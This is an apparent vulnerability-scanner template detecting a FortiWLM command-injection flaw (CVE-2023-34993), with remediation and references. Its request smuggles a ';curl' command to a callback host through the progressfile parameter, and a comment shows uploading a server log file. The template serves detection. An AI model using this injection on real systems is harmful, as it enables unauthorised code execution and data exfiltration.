45 lines
1.7 KiB
YAML
45 lines
1.7 KiB
YAML
id: CVE-2023-34993
|
|
|
|
info:
|
|
name: Fortinet FortiWLM Unauthenticated Command Injection Vulnerability
|
|
author: dwisiswant0
|
|
severity: critical
|
|
description: |
|
|
A improper neutralization of special elements used in an os command ('os
|
|
command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and
|
|
8.5.0 through 8.5.4 allows attacker to execute unauthorized code or commands
|
|
Successful exploitation of this vulnerability could allow an attacker to
|
|
bypass authentication and gain unauthorized access to the affected system.
|
|
remediation: |
|
|
For FortiWLM version 8.6.0 through 8.6.5 upgrade to version >= 8.6.6.
|
|
For FortiWLM version 8.5.0 through 8.5.4 upgrade to version >= 8.5.5.
|
|
reference:
|
|
- https://fortiguard.com/psirt/FG-IR-23-140
|
|
- https://www.horizon3.ai/attack-research/attack-blogs/fortiwlm-the-almost-story-for-the-forti-forty/
|
|
metadata:
|
|
max-request: 1
|
|
vendor: fortinet
|
|
product: fortiwlm
|
|
shodan-query: http.title:"FortiWLM"
|
|
tags: cve,cve2023,fortinet,fortiwlm,rce,unauth
|
|
|
|
variables:
|
|
progressfile: '{{rand_base(5)}};curl {{interactsh-url}} #' # -F "file=/data/apps/nms/logs/httpd_error_log"
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/ems/cgi-bin/ezrf_upgrade_images.cgi?op_type=deleteprogressfile&progressfile={{url_encode(progressfile)}}"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol
|
|
words:
|
|
- "http"
|
|
|
|
- type: word
|
|
part: interactsh_request
|
|
words:
|
|
- "User-Agent: curl"
|
|
# digest: 490a0046304402205d0bf594e5e591c8131ea79f03e90148cd44bb6a34f98409151d12e3e02decdf02200769496d8dae7769c9ed8d8aff7f94757ad51ddb46d0c8212cba99fd3f6c225b:922c64590222798bb761d5b6d8e72950 |